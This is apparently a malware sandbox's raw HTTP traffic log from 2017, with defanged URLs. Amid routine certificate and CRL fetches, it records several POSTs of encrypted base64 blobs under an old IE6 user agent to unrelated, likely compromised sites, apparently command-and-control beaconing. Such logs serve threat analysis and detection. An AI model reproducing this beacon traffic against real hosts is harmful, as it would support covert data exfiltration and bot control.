JWGV46Su23IYhjUMPykwp3dh fxcbEApGJ6BQyGYMGugXbqlFTk4cdFqriVRaI4OXxmt1SMY54Cnc2evBUEfJL6721QRzWTxXnA /bG3jBwGBQVe680wamt9ogaUolOolpnqafuqBXKfbCfIU5gRn4rZM55XJ8ggyQmqziaEtG1/LUYlUpc9fv89t60by6eq40wfAJZ6VhHp9ZG8ERkPnXg0zx2JjTfMQyjtevs2 r7qG7YpkI7jw2uNS5jYpsg/XNqvlczKoXYKXWYUUZ5fdzWrBGbmqxQfRi7QAfZoyzgwOOaS1gg5yZ8ydtoxWU/m IgJJyc C1mQJs1qYpD/L4TDEdw3s3RWULryuazJkqZlVzJ758UftasOgjCaR8jm88LOk3pGXL IJlQctkpjxjiVRS1Q8L Rl4GLp5vnTIzYgOlygCXYP81wwGSRuRdJo7xcThPzCcE5U4Plvc19UwtG/LcOt05qH0l7WvZxDQ==
HTTP/1.1 400 Bad Request
Date: Sat, 01 Jul 2017 11:17:02 GMT
Server: Apache/2.2.31 (Unix) mod_EZpics/2.2.31 mod_button/1.3.12 mod_perl/2.0.5 Perl/v5.8.8
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>400 Bad Request</title>.</head>&l
t;body>.<h1>Bad Request</h1>.<p>Your browser sent
a request that this server could not understand.<br />.</p&g
t;.</body></html>...


GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:49 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=121898, public, no-transform, must-revalidate
Last-Modified: Sat, 01 Jul 2017 10:56:23 GMT
Expires: Sun, 02 Jul 2017 22:56:23 GMT
ETag: "7f5ed7ff9db76239926cced1d44779131551b26a"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Content-Length: 1697
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Da
ddy Root Validation Authority - G1..20170701105623Z0f0d0<0... .....
.... ......]..J^.y_..F<........L.q.a.=....j...........2017070110562
3Z....20170702225623Z0...*.H.............@.H|.....*..n-.,...3.8!Xp.DG.
....(..PLl}....up.....v.V.<S.....veU.lH.....8A....Gk..^.....^`.....
.?i..=N7I.T..U.\.@.....}.Q.{.....R.T....n.4.[...O... d7......Y....d;..
(...X_:..#2..V.i..T{..3&....Y.......%.7..t...r#.(.6.e.h.}g.}......s...
.......F.M../.....:....b0..^0..Z0..B.......1g....r.0...*.H........0c1.
0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Clas
s 2 Certification Authority0...161213070000Z..211213070000Z0..1.0...U.
...US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, In
c.100...U...'Go Daddy Root Validation Authority - G10.."0...*.H.......
......0.............}...@.H..........j.b.2.c....'eSA.....6""2.hf.m.m9.
......._N."gV..{.J"{..0f.W$.Xr....|U.F.!.K.0 .(p......9.I......c.c\.9.
xt.v.UN...%....,R....ZJ......rz.Z..p...ru.6.....0..t....*...T.W.....?.
..X...( ..z.[. .A... z.[>-.y>...nvU...g.wU........ Fh.6F...}....
.....0..0...U.......0.0...U...........0...U.%..0... .......0...U......
..J!~...}....^].....0... .....0......0=..U...60402.0...,hXXp://crl.god
addy.com/repository/gdroot.crl0J..U. .C0A0?..`.H...m....000... .......
."hXXp://crl.godaddy.com/repository/0...*.H...............f...gb.dI..F
.72.$.......?/.....5.9-F.=...c....c..Wg.U......j0....A..[O.A>".

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 492
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: isp-h.com
Connection: Keep-Alive
Cache-Control: no-cache

6n4ox4x9NHIqpr6f9xvLNZ9YtZNk6S3YgGcp 6eSKM166arEgYX93R eSfjgwV Ceg7du5aQsrTMr6UWKEZra4nN9jRFafOIddy7KTQvIQGzlKoLpWuVBgd1IFs2T3Zw3SSSertI AALaHHSKc8onvVWVRHEhq9tmwLYdFc7zT9oqrAwPAQifqEPDcgraMIITQYb7DR9NnPKLvb5vUy4eXgBxp0jTXlvQYREVTnFYaEnKcGOc1xl3FAlVKwSbp05x3qNdJ6bNI2/lZiahCg2OvgN37Az9FhmSWpdmOs84vU raaywlychcbhRf1TXbhpyYNtzCXMV6KwyFVL H2t9dMrcTagiSymztwWTa 85LGeAMdOvBJqsWnGLr4ESiEvNd1wqz/NPjmlUUNHu3qRZt4Vb3DRkXQT q3XqrGeVtj8l5InTcSSIgsncFReMgiTSO8LsLYc2xg2RJfVtxG 5GXl29jAz67/AeTrxBajEA==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:02 GMT
Content-Type: text/html
Content-Length: 22224
Connection: keep-alive
Last-Modified: Sat, 26 Sep 2015 01:40:12 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Apache
<?xml version="1.0" encoding="Shift_JIS"?>.<!DOCTYPE html PUB
LIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xht
ml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org
/1999/xhtml" xml:lang="ja" lang="ja"><!-- InstanceBegin template
="/Templates/temp.dwt" codeOutsideHTMLIsLocked="false" -->.<head
>.<meta name="Content-Language" content="ja" />.<meta http
-equiv="Content-Type" content="text/html; charset=Shift_JIS" />.<
;meta http-equiv="content-script-type" content="text/javascript" />
.<meta name="robots" content="INDEX,FOLLOW" />.<!-- InstanceB
eginEditable name="doctitle" -->.<title>.D.y...H...X ...[.R.X
.g.Z.........E.D.y.......x...FISP.z.[..</title>.<!-- Instance
EndEditable --><!-- InstanceBeginEditable name="head" -->.<
;meta name="Description" content=".D.y.s.......E.L.......q............
.......[.R.X.g.Z...............H...X.....B...S.......V.z.......Z......
...i.................B" />.<meta name="Keywords" content=".D.y .
... .H...X .n.E.X...[.J.[ .....Z.." />.<!-- InstanceEndEditable
-->.<link rel="home" href="index.html" title="...[.R.X.g.Z......
...E.D.y.......x...FISP.z.[.." />.<link rel="index" href="index.
html" title="...[.R.X.g.Z.........E.D.y.......x...FISP.z.[.." />.&l
t;link rel="stylesheet" href="css/style.css" type="text/css" />.<
;script type="text/javascript" src="js/script.js"></script>.&
lt;link rev="made" href="mailto:info@isp-h.com" />.</head>

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: e-kagami.com
Connection: Keep-Alive
Cache-Control: no-cache

i2nxu55GhWw1E9ru6X3EvoGNPHXeVC9VskDcU27XQNj5CbMNcBZdzduNjNRpMmD0d8EaVm2cF8I6Bjrd4ym4wbgzzihVukCJWXpST7F75OvCcsEC 4bM/Ecn6G4TX1dsd3z/8KxnLuPVs3Cw/bPNKNx4D9aVX7iOs vxCthBy1Em5IGY XEANIw84Mk3I2rhFK 0MH6FFXPNq/QB9wC7oF7NHUDgOQr57imoxYB/AWIK926AMvimOKtXdnb2cAVL17lR2b4V/vIgcKEY84YJgER3JkOl h4cOBRwWCrsFpkslokaf2cuXqUgGYmMXIEP8fsa6NJkhLtoPvsaiiTWPUhEHOy8qlZ Hl9erwwBHZhMTbCaztTbX91Do5VQTnYrd1GBlS4/pToNgDAknGdVZ Gu2YU3Rjo8QNIaeF8nzEJx3EqyTpteEelfYBmDe4acMDwghIlH3m/kbSsuMIa1nxBlDSqWqwKy3p5/CoADr2qcdLh2WXKV/K6jJrOaFVErke4KdAt 
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:55 GMT
Server: Apache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
c3ef...<!DOCTYPE html>.<html>..<head>.<!-- Google
Analytics Content Experiment code -->.<!--.<script>functi
on utmx_section(){}function utmx(){}(function(){var.k='5970293-1',d=do
cument,l=d.location,c=d.cookie;.if(l.search.indexOf('utm_expid=' k)>
;0)return;.function f(n){if(c){var i=c.indexOf(n '=');if(i>-1){var
j=c..indexOf(';',i);return escape(c.substring(i n.length 1,j<0?c..l
ength:j))}}}var x=f('__utmx'),xx=f('__utmxx'),h=l.hash;d.write(.'<s
c' 'ript src="' 'http' (l.protocol=='https:'?'s://ssl':.'://www') '.go
ogle-analytics.com/ga_exp.js?' 'utmxkey=' k .'&utmx=' (x?x:'') '&utmxx
=' (xx?xx:'') '&utmxtime=' new Date()..valueOf() (h?'&utmxhash=' escap
e(h.substr(1)):'') .'" type="text/javascript" charset="utf-8"><\
/sc' 'ript>')})();.</script><script>utmx('url','A/B');&
lt;/script>.-->.<!-- End of Google Analytics Content Experime
nt code -->..<meta charset="UTF-8">.<meta name="author" co
ntent=".............COM">.<meta name="copyright" content="Copyri
ght (c) .............COM">.<title>.............COM ..........
......................................................................
...............................</title>.<meta name="Keywords"
content="............,.....................,......,......,...,......,
......,...,......,......,......,.....................,................
..,.........,...,.........,.....................,..................,..
.............">.<meta name="Description" content="..........

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rueggeberg.com
Connection: Keep-Alive
Cache-Control: no-cache

tk3u4kYv4V3we//sYT2KV2mERc mXqyW2udD16NK6OdqWs7m/KWsL9db6L1iNQdVELFzrPzfxeX0OHMMGf0 UWT1q PY4 qEMD6yey8Wqn9SrFMZ7JmzJvPOQuA/jNdAistnKYn4fcLCUWFlXpaKWGF9xJ1rvKJ4nLmATlIg8EL5E mNyUnEoMBnYRa5fqTXRlkTiQ6J/bxsf0m0AqPTkbBZCYVGf/YmPFD4ivG8Fv3u5xAetd82emltquuAPeWyt5a37EnEivF/Umr HjKx2bQ9mJ4IzjfMUP 6jgw2IhV/kQXwLWwDIokmZNxZednf1h FctSk9jwBIo  5wI3vDmPv G3Y/mpSLe6JuuAbNe7ixXDNkgdWYO3XCP7PTmIzrxDwymf AI Le4tP1njmJyjS6SRfz6eCvVordjKj 95unBfiWkTF0ibiEpQ hBHa/6ftraa2UFHLx1siyhz
HTTP/1.1 301 Moved Permanently
Server: nginx/1.6.2
Date: Sat, 01 Jul 2017 11:16:38 GMT
Transfer-Encoding: chunked
Location: hXXp://VVV.pferd.com
0..HTTP/1.1 301 Moved Permanently..Server: nginx/1.6.2..Date: Sat, 01 
Jul 2017 11:16:38 GMT..Transfer-Encoding: chunked..Location: hXXp://ww
w.pferd.com..0..
....



POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rueggeberg.com
Connection: Keep-Alive
Cache-Control: no-cache

PAS8RN1Qgl4AoxeZFBza2hb1vguLwdMMYS81x2UWkiSfVPdCeHJzdOm6 nl9Zs2UbBY/3qbdF0AY5BAM4nNs0cvwFARVYH04PE nPqs7YuALvuilHfTJfLVt0dVc3/34AyBh11nCdmBJsHl38Jg2gpXrA10GDRxPUcSfhrn1wvo1KLWL5PqMzfTmFEQMzUPCTNUFuPcx51XtkPdDfJWQkq3Bg5UPnMIbpd4ksPiOxqjsw2QHpy8r5/yi3MY7sks1g7jTFZqssGqpuI7ORzI3CoE2 PM5129DBwUP48rqfkQxtfLeMc334F9rDkhbJIso5ENA7AYaa2xGH uNAqWsscS7iD/5d2fpln Qx2PJj6iJPpqi8MgFueUsfV4A4UavnY2RJ/xZxmC4NYYJLskDNcHtgK9gNYclSIJn/51ALiJDoCAjoYS4cr/BlWPidrQZgEeTOI84rE9kRLvdU5BObQXuT8En w==
HTTP/1.1 301 Moved Permanently
Server: nginx/1.6.2
Date: Sat, 01 Jul 2017 11:16:38 GMT
Transfer-Encoding: chunked
Location: hXXp://VVV.pferd.com
0..HTTP/1.1 301 Moved Permanently..Server: nginx/1.6.2..Date: Sat, 01 
Jul 2017 11:16:38 GMT..Transfer-Encoding: chunked..Location: hXXp://ww
w.pferd.com..0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 508
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: trinity-works.com
Connection: Keep-Alive
Cache-Control: no-cache

rgHhwKjlgYfj/hvHa4zwTBsnWb wWUgYXFsuFhwSmGH09R0xuzrBTY3izGhhL5VPFy203i4t5I6V8ckx6Fzn7aI 5A6gSeT6M5DV4bJLCM2XcCYGJmp8Ts8U4dtx7EZnUPOz9Y2EYK9zC2kBcsCOoaVVfvxpcOfTdQhQO5dZZnybyPMRNmMeCOgYtbSRXdiFe88dOWqq7KVXmOZVN1ejlq7YFt8k9uSN8KHtR02aKzpZEDpxIYgq9GL5doYcjMdFOeO7HZ/wQzPK0UT1MDVhLmeDGW800O UmY9GQZwHc9CreZqgXI7ztSR/AKcp6XHlhZWPBfe3DU/SSmzNRXbzTq1w0pPw QgBALbBxGGTiDeMUnmvPW/RU3KXcBOp5EsbAm0MABCVoqEqVXTPQHvMJCQgvpLmUS9TRthbCJ1ms4UvEna5qK/HHYnM1DgXzeDnoKvVW70H6xJvGjOH3ANTeTAReq0OYn8JdN71Q8 l816WP80 55rayFg5l2Q=
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:27 GMT
Server: Apache/2.2.31
Content-Length: 202
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /.on this server.</p>.</body></html>.
HTTP/1.1 403 Forbidden..Date: Sat, 01 Jul 2017 11:17:27 GMT..Server: A
pache/2.2.31..Content-Length: 202..Keep-Alive: timeout=5, max=100..Con
nection: Keep-Alive..Content-Type: text/html; charset=iso-8859-1..<
!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><h
ead>.<title>403 Forbidden</title>.</head><body
>.<h1>Forbidden</h1>.<p>You don't have permission
to access /.on this server.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 456
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: msasys.com
Connection: Keep-Alive
Cache-Control: no-cache

9P/RglFvFnqBP2p 8ODVPqrD2JAPg03eFdNphscVDc k BzcKbG26ydWFwNbiemTvKSL0PPTbQdi2xPbbMYBAC3VmlDJEyfKdLLzbdBnjUKP6TYTNwAd0mmPF7htHqdtbIkFc 9v12ZbTlPYaEy7Jl8dJzYb62pK/49h4dRQjctIW9xjPMdFjIrrnY/IzwM9hA5Pz7BaLjIVJiUGfoXII3hBqFMfF701mI3xbKr4qeZt4/ihzeIOS6mxRNO1Pi/qQRe8Eb1g7J MPXLbD9QBWDQxgUkj/ilwv7gHjxENjzXuX2F3I5RxwO90ZoJTK5Uxnwks9hH0F0rsc2Q8bZIH2FUrptCJh0FMr10PsOdwMsXJW6DIt8Dxqqk0bNGZQHwo99gBcD1rhMHgvn/1QXDABO5me4dKYyT0YpYCdKLqAUemEmiSh/XNPyI82zTP1YNzCcmHAJg=
HTTP/1.1 307 Temporary Redirect
Connection: close
Pragma: no-cache
cache-control: no-cache
Location: /


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Cookie: __cfduid=d7d05c77256da28a215bc113485b20c951498907821
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.cbsprinting.com.au
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Pingback: hXXp://VVV.cbsprinting.com.au/xmlrpc.php
Link: <hXXp://VVV.cbsprinting.com.au/?p=5>; rel=shortlink
Vary: Accept-Encoding,User-Agent
Server: cloudflare-nginx
CF-RAY: 3778f4e352fd825b-KBP
8d6d..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<!-
-[if IE 7]>..<html class="ie ie7" lang="en-US">..<![endif]
-->.<!--[if IE 8]>..<html class="ie ie8" lang="en-US">.
.<![endif]-->.<!--[if !(IE 7) | !(IE 8) ]><!-->.<
;html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<!--<![endif]--&g
t;.<head>.<meta charset="UTF-8"/>.<meta name="viewport"
content="width=device-width"/>.<meta http-equiv="Content-Type"
content="text/html; charset=utf-8"/>.<title>Printing Sydney -
Digital Printers Campbelltown - Brochure Services</title>.<m
eta name="keywords" content="printing Sydney, printing services Sydney
, voucher printing, printing service Sydney, printers Sydney, printing
in Sydney, sydney printing services, digital printing Sydney, offset
printing Sydney, printing campbelltown, printing services macarthur, d
igital printers Sydney, print and marketing, flyer printing Sydney, br
ochure printing Sydney, booklet printing Sydney, sticker printing Sydn
ey, poster printing Sydney, corporate stationery, leaflet printing syd
ney"/>.<link rel="profile" href="hXXp://gmpg.org/xfn/11"/>.&l
t;link rel="pingback" href="hXXp://VVV.cbsprinting.com.au/xmlrpc.php"/
>.<script src="hXXp://code.jquery.com/jquery-1.9.1.js"></s
cript>.<script type="text/javascript" src="hXXp://VVV.cbsprintin
g.com.au/wp-content/themes/cbsprinting/js/easySlider1.7.js"><

<<< skipped >>>

GET /CRL/Omniroot2025.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sat, 16 Nov 2013 06:15:02 GMT
If-None-Match: "200da-5b6-4eb453c33260e"
User-Agent: Microsoft-CryptoAPI/6.1
Host: cdp1.public-trust.com


HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-pkcs7-crl
Date: Sat, 01 Jul 2017 11:17:25 GMT
Etag: "200da-f1d-552672ea46f6e"
Last-Modified: Tue, 20 Jun 2017 17:00:01 GMT
Server: ECS (frf/8799)
X-Cache: HIT
Content-Length: 3869
0...0......0...*.H........0Z1.0...U....IE1.0...U....Baltimore1.0...U..
..CyberTrust1"0 ..U....Baltimore CyberTrust Root..170620155552Z..17091
5155552Z0..`0....'k...120111220757Z0....'k...120111220847Z0....'.C..13
0130174530Z0....'....130807173059Z0....'....140122185220Z0....'....140
212185542Z0....'yr..150701184507Z0....'#...100303201301Z0....''q..1004
14175202Z0....'L...110224181251Z0....'Pn..110309142119Z0....'....10021
6203312Z0....'#...100303201213Z0....'3#..100908172555Z0....''n..101208
175627Z0....''m..101208175749Z0....''p..101208175916Z0....'H...1101141
62156Z0#...'X>..110815145134Z0.0...U.......0#...'Z2..110818184101Z0
.0...U.......0....'g...120111164333Z0....'g...120111164409Z0....'g...1
20111164519Z0....'....100216213519Z0....''s..100414175225Z0....''k..10
0414181839Z0....'3"..100908172705Z0....'3$..100908172728Z0....''o..101
208175645Z0....''l..101208175727Z0....'H...110119195142Z0....'Nz..1103
02154045Z0....'c...111207220933Z0....'g...120111164445Z0....''r..10041
4175143Z0....'8...101012182723Z0....'e...120111163041Z0....'VJ..110714
160903Z0....'s...130123162633Z0....'....130904190524Z0....'....1310242
14319Z0....'....140129172435Z0....'....140129172453Z0....'....13102421
4310Z0....'....131101204601Z0....'....140219171632Z0....'.^..140409155
638Z0....'i...140709171930Z0....'/:..141119193302Z0....'J...1506031846
05Z0....'k...150603185020Z0....'k...150603185058Z0....'k...15060318513
1Z0....'k...120111220827Z0....'8...140716191203Z0....'....131219195909
Z0....'....140219171545Z0....'k...151105070000Z0....'q...160126173

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.itgsolutions.nl
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:52 GMT
Server: Apache
Location: hXXp://itgsolutions.nl/
Content-Length: 231
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://itgsolutions.nl/">here</a&g
t;.</p>.</body></html>.HTTP/1.1 301 Moved Permanentl
y..Date: Sat, 01 Jul 2017 11:16:52 GMT..Server: Apache..Location: http
://itgsolutions.nl/..Content-Length: 231..Keep-Alive: timeout=5, max=1
00..Connection: Keep-Alive..Content-Type: text/html; charset=iso-8859-
1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html&g
t;<head>.<title>301 Moved Permanently</title>.</h
ead><body>.<h1>Moved Permanently</h1>.<p>Th
e document has moved <a href="hXXp://itgsolutions.nl/">here</
a>.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: midwestga.com
Connection: Keep-Alive
Cache-Control: no-cache

wqcxRVk9rXesCqwvaIZdVPKmMfW3TWiTncWF5ltPMrb6NWyZDN3n6ALe6M2xODHnf P8XYElaIEqjALsMIjwpuu5P4QW/m2315tPub9Rmkka8rrIbFxD8ZOf2XiBGSoarlTpp1Bru0N McWVMTrR5s981wmkhZT8Qp5pYQ4os4fskx2Wgec0O9di2wPVgqriJ/XtMqY1G nvkwSQfd7iA2OrFcCFVEhBHmg0CsMuSDYn3g2eeutpYelaWWu/rpVhVdoyuBEp4f4 kInECsGYW8tw9xV lMaowSXZcIKSpDiJUeHozFp7zRzoARmNTiRx6nWJPAMZV8wFTbSgrSGrZ JIVUATtusH1wNRhC0xVwZIy95TKaIeWsZXBQPOyVc1v/EIO56/gVdR JhjDevXshZB0b51kyG1vg2doDKIm4LeanMVhw9jFWZAclCxPYHOa0PGP6nMZr3M83h02pFTdqKiSSdBtN605oJIWus5tTfrqdyU w==
HTTP/1.1 403 Forbidden
Server: nginx/1.6.2
Date: Sat, 01 Jul 2017 11:17:08 GMT
Content-Type: text/html
Content-Length: 570
Connection: close
<html>..<head><title>403 Forbidden</title><
/head>..<body bgcolor="white">..<center><h1>403 F
orbidden</h1></center>..<hr><center>nginx/1.6.
2</center>..</body>..</html>..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..<!-- a
padding to disable MSIE and Chrome friendly error page -->..<!--
a padding to disable MSIE and Chrome friendly error page -->....


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.taykon.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 19 Nov 2015 14:08:09 GMT
Accept-Ranges: bytes
ETag: "72f64fb8d322d11:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Sat, 01 Jul 2017 11:18:02 GMT
Content-Length: 122
<META http-equiv="refresh" content="0;URL=hXXp://VVV.tamplastik.com
/?utm_source=taykon&utm_medium=ws&utm_campaign=aski" />HTTP/1.1 200
OK..Content-Type: text/html..Last-Modified: Thu, 19 Nov 2015 14:08:09
GMT..Accept-Ranges: bytes..ETag: "72f64fb8d322d11:0"..Server: Microso
ft-IIS/8.5..X-Powered-By: ASP.NET..X-Powered-By-Plesk: PleskWin..Date:
Sat, 01 Jul 2017 11:18:02 GMT..Content-Length: 122..<META http-equ
iv="refresh" content="0;URL=hXXp://VVV.tamplastik.com/?utm_source=tayk
on&utm_medium=ws&utm_campaign=aski" />..


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86393
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Fri, 16 Sep 2016 21:16:59 GMT
If-None-Match: "8017f9a85f10d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/vnd.ms-cab-compressed
Last-Modified: Tue, 13 Jun 2017 19:04:53 GMT
Accept-Ranges: bytes
ETag: "80f83df077e4d21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 52967
Date: Sat, 01 Jul 2017 11:16:44 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
MSCF............,...................I..................J.` .authroot.s
tl.^R.Y.6..CK...8...........].y.Q..!Jv..%k.....!..DH...B.KBWE.(.f.RQ*.
..f...}'.....x.:.{f...|.s.q..CF.......0....{%i......P.F.yNz:A..L..1..3
...........IG.....4=....~."|..s.|.xuT..._.*.....e.h,....ozs..*.!TmS..A
q... |,.....V..xV....^....FE(.x...N..h...b....y...j.!....7..h. ..@.(V.
.....8..`-..#=.jq'.e...|..X...@...{..rj.d.....?n3.L.......S.......:.O.
.."k.!o......`.l.B 1.....#].....k6.........B.......!P$.A..<..?zk...
.~..P)A0tu....x..-X..E..,a.7,xN..eed.3..L..XT......IG.w_.Y....E....~k.
.X...T.V.g7d.....#.&~.f.O....Dh...x0..J...0..u.dF..P.!..d...%x<!...
....@,...0..3..-.....q.....X.e....A...z.'..2.<.m.f...I.9.z..a.6vo..
...P..U7...-.0.Q..<zd!V....=.'.....2H;..5.7.%5PsD.#.....ht%......f
..s.Dp..Lklx%[.!c...I.<...f.<..e.k`......^.......X..?Z...?......
?..I}..5V.v .q.c.9j..Y..J..0U.t./%..Jd @.W.u......U.".)C(........T.4.y
..J.57*^HlY....O|..~\.J]..]e...?..x2c..6.....i.=?x.....N..-X..f"^@'...
.-v..v...7j.Y1.5._v.....*S9.."........%E<E...;p.}........0..P....g.
.@.]E.3........K....K.4V..Q.-,.../.........:.A....Ng,.........BFef.[..
. ..."*...^...L._#:,7..6:.z..!a............E.r>......A....#..c.....
rS.......7.D..JdR.`6.|...>.0....Wf..n..^..8x.4..........-.3y,3.C.(.
...9f...iNK....q....sUq....c...c.....*K.8"..D...<..0............*x,
$x....a....]..p..t.M....6F..u.....p.r.kf...Z......h~.B3...[.....Hc...K
.....I.....%F..:.....N....U..eU........ e. k....3(S..h....1..r..Z.Y...
.....A.i..Z....[%J.....=2"v].....L.P..!........PC*.........j 8.~.)

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

Cache-Control: max-age = 86399
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 13 Jun 2017 19:04:53 GMT
If-None-Match: "80f83df077e4d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 304 Not Modified
Content-Type: application/vnd.ms-cab-compressed
Last-Modified: Tue, 13 Jun 2017 19:04:53 GMT
ETag: "80f83df077e4d21:0"
Cache-Control: max-age=604800
Date: Sat, 01 Jul 2017 11:16:49 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
HTTP/1.1 304 Not Modified..Content-Type: application/vnd.ms-cab-compre
ssed..Last-Modified: Tue, 13 Jun 2017 19:04:53 GMT..ETag: "80f83df077e
4d21:0"..Cache-Control: max-age=604800..Date: Sat, 01 Jul 2017 11:16:4
9 GMT..Connection: keep-alive..X-CCC: UA..X-CID: 2..
....



GET /msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Content-Length: 1213
Date: Sat, 01 Jul 2017 11:16:57 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0...0..........@..d!..!........0...*.H........0..1.0...U....US1.0...U.
...VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008
VeriSign, Inc. - For authorized use only1806..U.../VeriSign Universal
Root Certification Authority0...080402000000Z..371201235959Z0..1.0...U
....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..
U...1(c) 2008 VeriSign, Inc. - For authorized use only1806..U.../VeriS
ign Universal Root Certification Authority0.."0...*.H.............0...
......a7^..4.b....XZ.##.`......z.X.8....d...q......M...-s..iq..9<.D
